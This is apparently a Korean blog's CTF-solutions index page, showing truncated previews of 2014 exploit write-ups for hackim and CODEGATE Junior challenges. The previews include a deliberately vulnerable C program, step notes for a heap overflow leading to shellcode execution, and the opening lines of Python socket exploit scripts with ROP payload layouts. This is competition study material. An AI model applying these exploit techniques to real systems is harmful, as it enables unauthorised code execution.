Security/[게임] CTF 풀이56

[exploit] hackim 2014 exploit 400
include #include #include #include #include #include #include
#define STACK 64
#define HEAP 64
#define FLAG "./flag"
/* gcc -masm=intel -z norelro -fno-stack-protector -o chall_heap chall_heap.c */
const char *malloc_error = "Memory allocation failed!\n";
const char *file_error = "Opening flag failed!\n";
const char *pwn = "Good Enough? Pwn Me!\n";
void main(int argc, char **argv) { char *flag; ..
2014. 2. 13.

[exploit] hackim 2014 exploit 300
# 1. malloc(0x100)과 malloc(0)을 생성.
# 2. malloc(0)의 size는 stage2에서 버퍼를 채움으로써 변경가능
# 3. strcpy(0x100, 0x110)으로 Heap Overflow 발생
# 4. [Heeeeeeeeaaaaaaaaaaapppp][Function1][Function2] 힙을 채움으로써 function1을 덮을수 있음
# 5. function1은 [pop ret]로 덮음
# 6. 그 후 stage 4 코드대로 쉘코드 실행
import struct
p = lambda x: struct.pack("
2014. 2. 11.

[exploit] CODEGATE Junior 2014 nuclear
import socket
import struct
import time
p = lambda x:struct.pack("
2014. 2. 10.

[exploit] hackim 2014 exploit 200
import socket
import struct
ip = "192.168.0.14"
port = 6776
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#payload = [strcpy] [pp ret] [freespace] [0xFF] [strcpy] [pp ret] [freespace+1] [0xE4] [freespace] [shellcode]
# or [strcpy] [pp ret] [freespace] [0xFFE4] [freespace] [shellcode]
strcpy = struct.pack("
2014. 2. 7.